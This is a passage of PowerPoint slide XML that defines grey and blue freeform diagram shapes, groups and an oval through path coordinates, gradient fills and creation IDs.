                <a:gd name="T8" fmla="*/ 349 w 351"/>
                <a:gd name="T9" fmla="*/ 1810 h 1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1" h="1810">
                  <a:moveTo>
                    <a:pt x="349" y="1810"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="1714"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="351" y="94"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="349" y="1810"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:gradFill rotWithShape="1">
              <a:gsLst>
                <a:gs pos="0">
                  <a:srgbClr val="C0C0C0">
                    <a:gamma/>
                    <a:tint val="62745"/>
                    <a:invGamma/>
                  </a:srgbClr>
                </a:gs>
                <a:gs pos="50000">
                  <a:srgbClr val="C0C0C0">
                    <a:alpha val="50000"/>
                  </a:srgbClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:srgbClr val="C0C0C0">
                    <a:gamma/>
                    <a:tint val="62745"/>
                    <a:invGamma/>
                  </a:srgbClr>
                </a:gs>
              </a:gsLst>
              <a:lin ang="0" scaled="1"/>
            </a:gradFill>
            <a:ln w="9525" cap="flat" cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="80808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10" name="Freeform 415">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0482837D-BE08-4DFA-B63C-373E67792106}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="5695410" y="2531773"/>
              <a:ext cx="1925841" cy="518496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CACACA"/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11" name="Freeform 417">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EBDE9225-9F45-4077-BD25-7D303ABCFF40}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="5702817" y="3639871"/>
              <a:ext cx="1925841" cy="518496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CACACA"/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612" name="Group 913">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D59494F9-B7B3-4C7E-B9FE-C6B623D904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03509" y="2134754"/>
              <a:ext cx="281469" cy="465165"/>
              <a:chOff x="4140" y="1950"/>
              <a:chExt cx="190" cy="314"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1144" name="Freeform 911">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{24FEF6FB-50D1-477C-A2D4-EBE33A48FB05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4235" y="1976"/>
                <a:ext cx="95" cy="288"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 600"/>
                  <a:gd name="T1" fmla="*/ 161 h 1817"/>
                  <a:gd name="T2" fmla="*/ 0 w 600"/>
                  <a:gd name="T3" fmla="*/ 1817 h 1817"/>
                  <a:gd name="T4" fmla="*/ 600 w 600"/>
                  <a:gd name="T5" fmla="*/ 1656 h 1817"/>
                  <a:gd name="T6" fmla="*/ 600 w 600"/>
                  <a:gd name="T7" fmla="*/ 0 h 1817"/>
                  <a:gd name="T8" fmla="*/ 0 w 600"/>
                  <a:gd name="T9" fmla="*/ 161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0" h="1817">
                    <a:moveTo>
                      <a:pt x="0" y="161"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="1817"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="600" y="1656"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="600" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="161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45" name="Freeform 912">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DEAC013C-E7E4-4D0F-820F-5D5A8C81A081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4140" y="1950"/>
                <a:ext cx="95" cy="289"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 600 w 600"/>
                  <a:gd name="T1" fmla="*/ 0 h 1819"/>
                  <a:gd name="T2" fmla="*/ 0 w 600"/>
                  <a:gd name="T3" fmla="*/ 163 h 1819"/>
                  <a:gd name="T4" fmla="*/ 0 w 600"/>
                  <a:gd name="T5" fmla="*/ 1819 h 1819"/>
                  <a:gd name="T6" fmla="*/ 600 w 600"/>
                  <a:gd name="T7" fmla="*/ 1656 h 1819"/>
                  <a:gd name="T8" fmla="*/ 600 w 600"/>
                  <a:gd name="T9" fmla="*/ 0 h 18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0" h="1819">
                    <a:moveTo>
                      <a:pt x="600" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="1819"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="600" y="1656"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="600" y="0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613" name="Oval 434">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB392749-BD26-4E38-8254-81282DE9B29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052430" y="1598149"/>
              <a:ext cx="1272537" cy="392575"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:gradFill rotWithShape="1">
              <a:gsLst>
                <a:gs pos="0">
                  <a:srgbClr val="CACACA"/>
                </a:gs>
                <a:gs pos="100000">
                  <a:srgbClr val="B2B2B2"/>
                </a:gs>
              </a:gsLst>
              <a:lin ang="5400000" scaled="1"/>
            </a:gradFill>
            <a:ln w="19050" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd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lIns="0" tIns="0" rIns="0" bIns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</a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="614" name="Freeform 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E22AB521-D7DD-4F30-BC02-C35659B710AD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeAspect="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2966542" y="3183474"/>
              <a:ext cx="1908064" cy="511089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15" name="Freeform 67">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{96CAB388-161D-4B48-9106-38DA3A451CE3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeAspect="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="4250504" y="3979770"/>
              <a:ext cx="1913990" cy="512570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616" name="Group 223">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27C65B52-66EC-4220-9347-EE6B5E09116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114081" y="3957548"/>
              <a:ext cx="577752" cy="173326"/>
              <a:chOff x="1728" y="-938"/>
              <a:chExt cx="3134" cy="936"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1140" name="Freeform 224">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8366771D-0E71-4D59-A68B-2406768ED05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28" y="-699"/>
                <a:ext cx="196" cy="630"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 196"/>
                  <a:gd name="T1" fmla="*/ 0 h 630"/>
                  <a:gd name="T2" fmla="*/ 0 w 196"/>
                  <a:gd name="T3" fmla="*/ 97 h 630"/>
                  <a:gd name="T4" fmla="*/ 196 w 196"/>
                  <a:gd name="T5" fmla="*/ 630 h 630"/>
                  <a:gd name="T6" fmla="*/ 196 w 196"/>
                  <a:gd name="T7" fmla="*/ 534 h 630"/>
                  <a:gd name="T8" fmla="*/ 0 w 196"/>
                  <a:gd name="T9" fmla="*/ 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630">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="196" y="630"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="196" y="5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41" name="Freeform 225">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4BCC5B21-AA43-403D-B037-1DD6E6864BF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924" y="-165"/>
                <a:ext cx="2043" cy="163"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 2043 w 2043"/>
                  <a:gd name="T1" fmla="*/ 163 h 163"/>
                  <a:gd name="T2" fmla="*/ 2043 w 2043"/>
                  <a:gd name="T3" fmla="*/ 68 h 163"/>
                  <a:gd name="T4" fmla="*/ 0 w 2043"/>
                  <a:gd name="T5" fmla="*/ 0 h 163"/>
                  <a:gd name="T6" fmla="*/ 0 w 2043"/>
                  <a:gd name="T7" fmla="*/ 96 h 163"/>
                  <a:gd name="T8" fmla="*/ 2043 w 2043"/>
                  <a:gd name="T9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43" h="163">
                    <a:moveTo>
                      <a:pt x="2043" y="163"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="2043" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2043" y="163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42" name="Freeform 226">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B121B1C-F022-46B8-A904-00B97947B20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518" y="-579"/>
                <a:ext cx="1344" cy="456"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T1" fmla="*/ 0 h 456"/>
                  <a:gd name="T2" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T3" fmla="*/ 95 h 456"/>
                  <a:gd name="T4" fmla="*/ 0 w 1344"/>
                  <a:gd name="T5" fmla="*/ 456 h 456"/>
                  <a:gd name="T6" fmla="*/ 0 w 1344"/>
                  <a:gd name="T7" fmla="*/ 362 h 456"/>
                  <a:gd name="T8" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T9" fmla="*/ 0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6">
                    <a:moveTo>
                      <a:pt x="1344" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1344" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="456"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="362"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344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43" name="Freeform 227">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2800AE56-E1CC-49F0-95BD-703536D9253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28" y="-938"/>
                <a:ext cx="3134" cy="841"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 196 w 3134"/>
                  <a:gd name="T1" fmla="*/ 773 h 841"/>
                  <a:gd name="T2" fmla="*/ 0 w 3134"/>
                  <a:gd name="T3" fmla="*/ 239 h 841"/>
                  <a:gd name="T4" fmla="*/ 446 w 3134"/>
                  <a:gd name="T5" fmla="*/ 359 h 841"/>
                  <a:gd name="T6" fmla="*/ 1790 w 3134"/>
                  <a:gd name="T7" fmla="*/ 0 h 841"/>
                  <a:gd name="T8" fmla="*/ 3134 w 3134"/>
                  <a:gd name="T9" fmla="*/ 359 h 841"/>
                  <a:gd name="T10" fmla="*/ 1790 w 3134"/>
                  <a:gd name="T11" fmla="*/ 721 h 841"/>
                  <a:gd name="T12" fmla="*/ 2239 w 3134"/>
                  <a:gd name="T13" fmla="*/ 841 h 841"/>
                  <a:gd name="T14" fmla="*/ 196 w 3134"/>
                  <a:gd name="T15" fmla="*/ 773 h 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4" h="841">
                    <a:moveTo>
                      <a:pt x="196" y="773"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="239"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446" y="359"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1790" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3134" y="359"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1790" y="721"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2239" y="841"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="196" y="773"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="0061B2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617" name="Group 230">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D967707-8296-4E4E-AE18-954AF97EDAC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8977703" y="3788667"/>
              <a:ext cx="724413" cy="503682"/>
              <a:chOff x="1704" y="2914"/>
              <a:chExt cx="1483" cy="1032"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="1097" name="Group 231">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F934DBCA-DF81-415D-B621-14E80D2C4ED9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1704" y="2914"/>
                <a:ext cx="1483" cy="1032"/>
                <a:chOff x="-1496" y="3101"/>
                <a:chExt cx="4084" cy="2842"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="1099" name="Freeform 232">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A4E40F7B-8B75-46E1-AB00-73749F36517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2087" y="4070"/>
                  <a:ext cx="168" cy="484"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 168"/>
                    <a:gd name="T1" fmla="*/ 484 h 484"/>
                    <a:gd name="T2" fmla="*/ 0 w 168"/>
                    <a:gd name="T3" fmla="*/ 45 h 484"/>
                    <a:gd name="T4" fmla="*/ 168 w 168"/>
                    <a:gd name="T5" fmla="*/ 0 h 484"/>
                    <a:gd name="T6" fmla="*/ 168 w 168"/>
                    <a:gd name="T7" fmla="*/ 442 h 484"/>
                    <a:gd name="T8" fmla="*/ 0 w 168"/>
                    <a:gd name="T9" fmla="*/ 484 h 4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8" h="484">
                      <a:moveTo>
                        <a:pt x="0" y="484"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="45"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="168" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="168" y="442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00" name="Freeform 233">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D436B4F-CB5F-4A8C-95C8-092C20E49C9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2057" y="4108"/>
                  <a:ext cx="30" cy="446"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 30 w 30"/>
                    <a:gd name="T1" fmla="*/ 7 h 446"/>
                    <a:gd name="T2" fmla="*/ 0 w 30"/>
                    <a:gd name="T3" fmla="*/ 0 h 446"/>
                    <a:gd name="T4" fmla="*/ 0 w 30"/>
                    <a:gd name="T5" fmla="*/ 439 h 446"/>
                    <a:gd name="T6" fmla="*/ 30 w 30"/>
                    <a:gd name="T7" fmla="*/ 446 h 446"/>
                    <a:gd name="T8" fmla="*/ 30 w 30"/>
                    <a:gd name="T9" fmla="*/ 7 h 4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446">
                      <a:moveTo>
                        <a:pt x="30" y="7"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="439"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="30" y="446"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="30" y="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01" name="Freeform 234">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD62895D-DC82-4648-9735-B9078AA25E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2057" y="4063"/>
                  <a:ext cx="198" cy="52"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 198 w 198"/>
                    <a:gd name="T1" fmla="*/ 7 h 52"/>
                    <a:gd name="T2" fmla="*/ 165 w 198"/>
                    <a:gd name="T3" fmla="*/ 0 h 52"/>
                    <a:gd name="T4" fmla="*/ 0 w 198"/>
                    <a:gd name="T5" fmla="*/ 45 h 52"/>
                    <a:gd name="T6" fmla="*/ 30 w 198"/>
                    <a:gd name="T7" fmla="*/ 52 h 52"/>
                    <a:gd name="T8" fmla="*/ 198 w 198"/>
                    <a:gd name="T9" fmla="*/ 7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8" h="52">
                      <a:moveTo>
                        <a:pt x="198" y="7"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="165" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="45"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="30" y="52"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="198" y="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02" name="Freeform 235">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{750F4207-1590-43B2-935B-D2B7B2ED710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2033" y="3992"/>
                  <a:ext cx="26" cy="31"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 2 w 11"/>
                    <a:gd name="T1" fmla="*/ 2 h 13"/>
                    <a:gd name="T2" fmla="*/ 9 w 11"/>
                    <a:gd name="T3" fmla="*/ 4 h 13"/>
                    <a:gd name="T4" fmla="*/ 10 w 11"/>
                    <a:gd name="T5" fmla="*/ 12 h 13"/>
                    <a:gd name="T6" fmla="*/ 2 w 11"/>
                    <a:gd name="T7" fmla="*/ 9 h 13"/>
                    <a:gd name="T8" fmla="*/ 2 w 11"/>
                    <a:gd name="T9" fmla="*/ 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3">
                      <a:moveTo>
                        <a:pt x="2" y="2"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="4" y="0"/>
                        <a:pt x="7" y="1"/>
                        <a:pt x="9" y="4"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11" y="7"/>
                        <a:pt x="11" y="10"/>
                        <a:pt x="10" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8" y="13"/>
                        <a:pt x="5" y="12"/>
                        <a:pt x="2" y="9"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="6"/>
                        <a:pt x="0" y="3"/>
                        <a:pt x="2" y="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03" name="Freeform 236">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EDF2FBE9-0CBB-4478-A550-6FCC33E80B3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2033" y="4672"/>
                  <a:ext cx="26" cy="29"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 2 w 11"/>
                    <a:gd name="T1" fmla="*/ 1 h 12"/>
                    <a:gd name="T2" fmla="*/ 9 w 11"/>
                    <a:gd name="T3" fmla="*/ 4 h 12"/>
                    <a:gd name="T4" fmla="*/ 10 w 11"/>
                    <a:gd name="T5" fmla="*/ 11 h 12"/>
                    <a:gd name="T6" fmla="*/ 2 w 11"/>
                    <a:gd name="T7" fmla="*/ 9 h 12"/>
                    <a:gd name="T8" fmla="*/ 2 w 11"/>
                    <a:gd name="T9" fmla="*/ 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2" y="1"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="4" y="0"/>
                        <a:pt x="7" y="1"/>
                        <a:pt x="9" y="4"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11" y="6"/>
                        <a:pt x="11" y="10"/>
                        <a:pt x="10" y="11"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8" y="12"/>
                        <a:pt x="5" y="11"/>
                        <a:pt x="2" y="9"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="6"/>
                        <a:pt x="0" y="3"/>
                        <a:pt x="2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04" name="Freeform 237">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F6CBC0E3-2DE7-40FC-A27D-7A27F82211E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2045" y="3940"/>
                  <a:ext cx="220" cy="756"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 93"/>
                    <a:gd name="T1" fmla="*/ 25 h 320"/>
                    <a:gd name="T2" fmla="*/ 2 w 93"/>
                    <a:gd name="T3" fmla="*/ 33 h 320"/>
                    <a:gd name="T4" fmla="*/ 85 w 93"/>
                    <a:gd name="T5" fmla="*/ 10 h 320"/>
                    <a:gd name="T6" fmla="*/ 85 w 93"/>
                    <a:gd name="T7" fmla="*/ 290 h 320"/>
                    <a:gd name="T8" fmla="*/ 0 w 93"/>
                    <a:gd name="T9" fmla="*/ 312 h 320"/>
                    <a:gd name="T10" fmla="*/ 2 w 93"/>
                    <a:gd name="T11" fmla="*/ 320 h 320"/>
                    <a:gd name="T12" fmla="*/ 93 w 93"/>
                    <a:gd name="T13" fmla="*/ 296 h 320"/>
                    <a:gd name="T14" fmla="*/ 93 w 93"/>
                    <a:gd name="T15" fmla="*/ 0 h 320"/>
                    <a:gd name="T16" fmla="*/ 0 w 93"/>
                    <a:gd name="T17" fmla="*/ 25 h 3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3" h="320">
                      <a:moveTo>
                        <a:pt x="0" y="25"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="33"/>
                        <a:pt x="2" y="33"/>
                        <a:pt x="2" y="33"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="33"/>
                        <a:pt x="76" y="13"/>
                        <a:pt x="85" y="10"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="85" y="20"/>
                        <a:pt x="85" y="284"/>
                        <a:pt x="85" y="290"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="79" y="291"/>
                        <a:pt x="0" y="312"/>
                        <a:pt x="0" y="312"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="320"/>
                        <a:pt x="2" y="320"/>
                        <a:pt x="2" y="320"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="93" y="296"/>
                        <a:pt x="93" y="296"/>
                        <a:pt x="93" y="296"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="93" y="0"/>
                        <a:pt x="93" y="0"/>
                        <a:pt x="93" y="0"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="0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05" name="Freeform 238">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75F11672-09EE-4815-8B49-FAF521F4440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344" y="5258"/>
                  <a:ext cx="435" cy="435"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 187 w 435"/>
                    <a:gd name="T1" fmla="*/ 435 h 435"/>
                    <a:gd name="T2" fmla="*/ 0 w 435"/>
                    <a:gd name="T3" fmla="*/ 241 h 435"/>
                    <a:gd name="T4" fmla="*/ 435 w 435"/>
                    <a:gd name="T5" fmla="*/ 0 h 435"/>
                    <a:gd name="T6" fmla="*/ 380 w 435"/>
                    <a:gd name="T7" fmla="*/ 383 h 435"/>
                    <a:gd name="T8" fmla="*/ 187 w 435"/>
                    <a:gd name="T9" fmla="*/ 435 h 4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35" h="435">
                      <a:moveTo>
                        <a:pt x="187" y="435"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="241"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="435" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="380" y="383"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="187" y="43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06" name="Freeform 239">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{93112037-C669-4579-8FB9-236DFB307C0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-1449" y="4762"/>
                  <a:ext cx="458" cy="449"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 187 w 458"/>
                    <a:gd name="T1" fmla="*/ 449 h 449"/>
                    <a:gd name="T2" fmla="*/ 0 w 458"/>
                    <a:gd name="T3" fmla="*/ 255 h 449"/>
                    <a:gd name="T4" fmla="*/ 458 w 458"/>
                    <a:gd name="T5" fmla="*/ 0 h 449"/>
                    <a:gd name="T6" fmla="*/ 380 w 458"/>
                    <a:gd name="T7" fmla="*/ 397 h 449"/>
                    <a:gd name="T8" fmla="*/ 187 w 458"/>
                    <a:gd name="T9" fmla="*/ 449 h 4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8" h="449">
                      <a:moveTo>
                        <a:pt x="187" y="449"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="255"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="458" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="380" y="397"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="187" y="44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07" name="Freeform 240">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F96C695B-5818-4820-8FF6-67A0B8F0B50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611" y="5357"/>
                  <a:ext cx="498" cy="549"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 168 w 211"/>
                    <a:gd name="T1" fmla="*/ 67 h 232"/>
                    <a:gd name="T2" fmla="*/ 46 w 211"/>
                    <a:gd name="T3" fmla="*/ 15 h 232"/>
                    <a:gd name="T4" fmla="*/ 46 w 211"/>
                    <a:gd name="T5" fmla="*/ 15 h 232"/>
                    <a:gd name="T6" fmla="*/ 12 w 211"/>
                    <a:gd name="T7" fmla="*/ 23 h 232"/>
                    <a:gd name="T8" fmla="*/ 19 w 211"/>
                    <a:gd name="T9" fmla="*/ 38 h 232"/>
                    <a:gd name="T10" fmla="*/ 41 w 211"/>
                    <a:gd name="T11" fmla="*/ 164 h 232"/>
                    <a:gd name="T12" fmla="*/ 100 w 211"/>
                    <a:gd name="T13" fmla="*/ 212 h 232"/>
                    <a:gd name="T14" fmla="*/ 109 w 211"/>
                    <a:gd name="T15" fmla="*/ 232 h 232"/>
